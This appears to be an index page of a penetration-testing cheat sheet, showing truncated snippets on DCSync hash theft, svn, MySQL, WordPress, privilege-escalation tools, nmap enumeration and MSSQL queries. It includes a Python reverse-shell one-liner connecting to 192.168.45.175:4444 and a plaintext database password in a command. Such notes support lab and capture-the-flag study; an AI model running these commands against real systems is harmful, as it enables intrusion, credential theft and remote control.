DCSync Attack Another way to achieve persistence in an Active Directory infrastructure is to steal the password hashes for all administrative users in the domain. To do this, we could move lateral...

Enumeration commands svn ls svn://10.10.10.203 #list svn log svn://10.10.10.203 #Commit history svn checkout svn://10.10.10.203 #Download the repository svn up -r 2 #Go to revision 2 inside the ch...

Connection Common command to connect MariaDB and MySQL databases (avoid -p if you want to be prompted for the password): mysql -h 10.129.5.43 -u root -p 'th1s!smypassw0rd' MySQL Basic Commands: ...

Default paths: index.php license.txt contains useful information such as the version WordPress installed. wp-activate.php is used for the email activation process when setting up a new WordP...

LinPeas We can use linpeas on UNIX derivatives such as Linux. ./linpeas.sh | tee output.txt Unix_privesc_check We can use unix_privesc_check on UNIX derivatives such as Linux. The script support...

Find recursively a string: # Find ETSCTF on every file under the current directory find . -type f -exec grep -H 'ETSCTF' {} \; 2>/dev/null # Identify any file (not directory) modified in the las...

Enumeration Cipher Algorithms supported: nmap -p22 10.10.1.3 --script ssh2-enum-algos Public key from ssh server: nmap -p22 10.10.1.3 --script ssh-hostkey --script-args= ssh_hostkey=full Review i...

NMAP Scan port and info on NFS nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201 ... 111/tcp open rpcbind | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Us...

Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),...

Simple Commands Simple enumeration is to be abused with following queries such queries where taken from PayloadAllTheThings: # Version SELECT @@version # DB user SELECT user_name(); SELECT system_u...